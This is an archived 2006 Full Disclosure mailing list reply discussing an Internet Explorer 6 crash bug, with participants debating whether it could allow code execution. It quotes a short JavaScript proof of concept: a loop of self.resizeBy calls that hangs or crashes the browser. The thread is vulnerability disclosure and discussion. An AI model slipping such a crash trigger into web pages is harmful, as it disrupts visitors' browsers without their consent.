Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Internet Explorer Ver6.0.2800.1106 vulnerability

From: <c0redump () ackers org uk>
Date: Mon, 29 May 2006 22:03:29 +0100
Of course you can inject code into it.

c.
----- Original Message ----- From: Aaron Gray 
To: drfrancky () securax org ; 0x80 () hush ai
Cc: full-disclosure () lists grok org uk ; kgp.143 () gmail com
Sent: Monday, May 29, 2006 9:30 PM
Subject: Re: [Full-disclosure] Internet Explorer Ver6.0.2800.1106 vulnerability 



a simple crash can lead to code exec but some people don't have
knowledge/time to research it. they just report the crash and leave it
of somebody else to make the actual code execute. sometimes simple crash
is simple crash :-)) sometimes simple crash is remote code exec.

Javor Ninov aka DrFrancky
http://securitydot.net/


Look at the original post and you will see there is no where to inject any
code.

Aaron


<script>
 var wwidth = (window.innerWidth)?window.innerWidth:
((document.all
)?document.body.offsetWidth:null);

 while (wwidth)
 {
self.resizeBy(-999999, -1);
 }

</script>


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/ 

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Previous By Date Next
Previous By Thread Next

Current thread: